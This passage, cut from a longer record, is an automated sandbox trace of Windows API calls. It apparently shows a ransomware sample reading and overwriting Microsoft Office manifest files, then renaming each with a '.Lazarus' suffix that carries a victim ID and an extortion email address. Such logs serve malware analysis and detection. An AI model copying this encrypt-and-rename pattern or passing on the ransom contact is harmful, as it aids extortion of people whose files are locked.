dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0098.659] WriteFile (in: hFile=0x418, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0098.659] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0098.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0098.659] CloseHandle (hObject=0x418) returned 1 [0098.660] AreFileApisANSI () returned 1 [0098.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 105 [0098.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.660] GetFileType (hFile=0x418) returned 0x1 [0098.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.660] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0098.660] ReadFile (in: hFile=0x418, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0098.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0098.782] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0098.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e420 [0098.783] GetLastError () returned 0x0 [0098.783] SetLastError (dwErrCode=0x0) [0098.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.783] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0098.783] WriteFile (in: hFile=0x418, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0098.784] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0098.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0098.784] CloseHandle (hObject=0x418) returned 1 [0098.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x5fd18 [0098.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.785] AreFileApisANSI () returned 1 [0098.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 105 [0098.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5fd18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 167 [0098.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14e) returned 0x5e870 [0098.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5fd18, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=167 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 167 [0098.785] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x944a8 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.786] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x841a1e52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4bfb, dwReserved0=0xf33cc4fe, dwReserved1=0xf903ee37, cFileName="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", cAlternateFileName="APC422~1.XML")) returned 1 [0098.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e00 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e00 | out: hHeap=0x20000) returned 1 [0098.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8ced8 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0098.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0098.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88c48 [0098.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x890d0 [0098.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88c48 | out: hHeap=0x20000) returned 1 [0098.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x890d0 | out: hHeap=0x20000) returned 1 [0098.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.787] AreFileApisANSI () returned 1 [0098.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.787] AreFileApisANSI () returned 1 [0098.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 105 [0098.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.788] GetFileType (hFile=0x418) returned 0x1 [0098.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.788] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.789] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.789] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.789] CloseHandle (hObject=0x418) returned 1 [0098.789] AreFileApisANSI () returned 1 [0098.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 105 [0098.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.789] GetFileType (hFile=0x418) returned 0x1 [0098.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.789] CloseHandle (hObject=0x418) returned 1 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.791] AreFileApisANSI () returned 1 [0098.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 105 [0098.791] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x841a1e52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4bfb)) returned 1 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.791] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84391d75, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xba5e3, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP2169~1.XML")) returned 1 [0098.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0098.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0098.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8ca40 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0098.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0098.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0098.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.792] HeapFree (in: 